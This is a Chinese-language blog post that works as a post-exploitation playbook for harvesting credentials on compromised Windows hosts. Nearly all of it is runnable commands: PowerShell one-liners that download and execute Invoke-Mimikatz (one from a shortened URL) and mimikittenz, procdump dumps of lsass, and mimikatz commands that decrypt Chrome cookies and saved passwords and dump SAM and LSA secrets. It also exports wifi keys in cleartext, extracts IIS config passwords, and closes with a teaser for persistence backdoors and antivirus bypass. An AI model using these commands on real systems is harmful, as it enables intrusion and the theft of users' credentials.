后渗透常见的信息收集思路
延伸:
1.mimikatz 2.wce 3.getpass 4.QuarksPwDump 5.reg-sam 6.pwdump7 7.procdump.exe +mimikatz …….
1 | 1.powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" |
---|
tips:powershell 默认windows visa后才有
2. procdump lsass 进程导出技巧
12 | C:\temp\procdump.exe-accepteula-malsass.exelsass.dmp//For 32 bitsC:\temp\procdump.exe-accepteula-64-malsass.exelsass.dmp//For 64 bits |
---|
然后本地使用mimikatz 还原密码
C.windows本地的信息收集、回收站的信息获取
cmdkey /list 查看3389可信任链接 使用netpass.exe 即可知道密码
net use 查看到已建立连接记录。也是直接可以用wmic at sc 等直接执行命令的
其中$I开头的文件保存的是路径信息,$R保存的是文件
12345678910 | %localappdata%\google\chrome\USERDA~1\default\LOGIND~1 %localappdata%\google\chrome\USERDA~1\default\USERDA~1 %localappdata%\google\chrome\USERDA~1\default\cookies chrome的用户信息保存在本地文件为sqlite 数据库格式 |
---|
123456 | mimikatz读取chromecookiesmimikatz.exeprivilege::debuglog"dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect"exit mimikatz.exeprivilege::debuglog"dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\USERDA~1"exit mimikatz.exeprivilege::debuglog"dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1"exit//读chrome密码 |
---|
netsh wlan show profiles 列出链接过的wifi
netsh wlan export profile interface=无线网络连接 key=clear folder=C:\ 读取指定无线网络的连接密码,以明文方式显示
C:\Windows\System32\drivers\etc\hosts
windows7 windows2008等
C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
windows2003位置
提权情况下或者过了uac的情况下直接type一下就行了
iis-web路径
12345 | iis6 =========>cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs ENUM W3SVC/1/rootiis7 ,8 =======>appcmd.exe%systemroot%/system32/inetsrv/appcmd.exe list site ——列出网站列表 %systemroot%\system32\inetsrv\appcmd.exe list vdir ——列出网站物理路径 |
---|
当然你也可以用mimikatz
12 | mimiktaz读取iis7配置文件密码mimikatz.exeprivilege::debuglog"iis::apphost /in:"%systemroot%\system32\inetsrv\config\applicationHost.config" /live"exit |
---|
1 | reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" |
---|
1.Windows2003下默认存在eventquery.vbs
1 | cscriptc:\WINDOWS\system32\eventquery.vbs/fi"Datetime eq 06/24/2015,01:00:00AM-06/24/2015,10:00:00AM"/lSecurity/V#查看SECURITY日志 2015-6.24 上午1点-上午10点日志 |
---|
windows 7以上wevtutil 命令
2.查询所有登录、注销相关的日志语法
3.第三方信息收集工具LogParser.exe psloglist.exe等
1 | mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit |
---|
其他工具如Dialupass.exe
感兴趣可以看看mimikatz dpapi模块的使用。很强大 sam 密码 ipc连接密码
include:
vnc mail V** router ie firefox chrome
FTP访问、共享连接、putty连接 驱动、应用程序、hosts 文件、进程、无线网络记录
12 | powershell"IEX (New-Object Net.WebClient).DownloadString('https://github.com/samratashok/nishang/tree/master/Gather/Gather/Get-Information.ps1'); Get-Information" |
---|
正则过滤进程密码,已测windows7
1 | powershellIEX(New-ObjectSystem.Net.Webclient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1');Invoke-mimikittenz |
---|
sqlserver密码获取工具Get-MSSQLCredentialPasswords.psm1 //未测
抛砖引玉!!!!!欢迎交流
下期:windows自带的后门维持工具
bitsadmin schtasks at wimc+mof等应用
tips:已360为例,绕过技巧
链接: http://pan.baidu.com/s/1o8NFSaI 密码: ypd8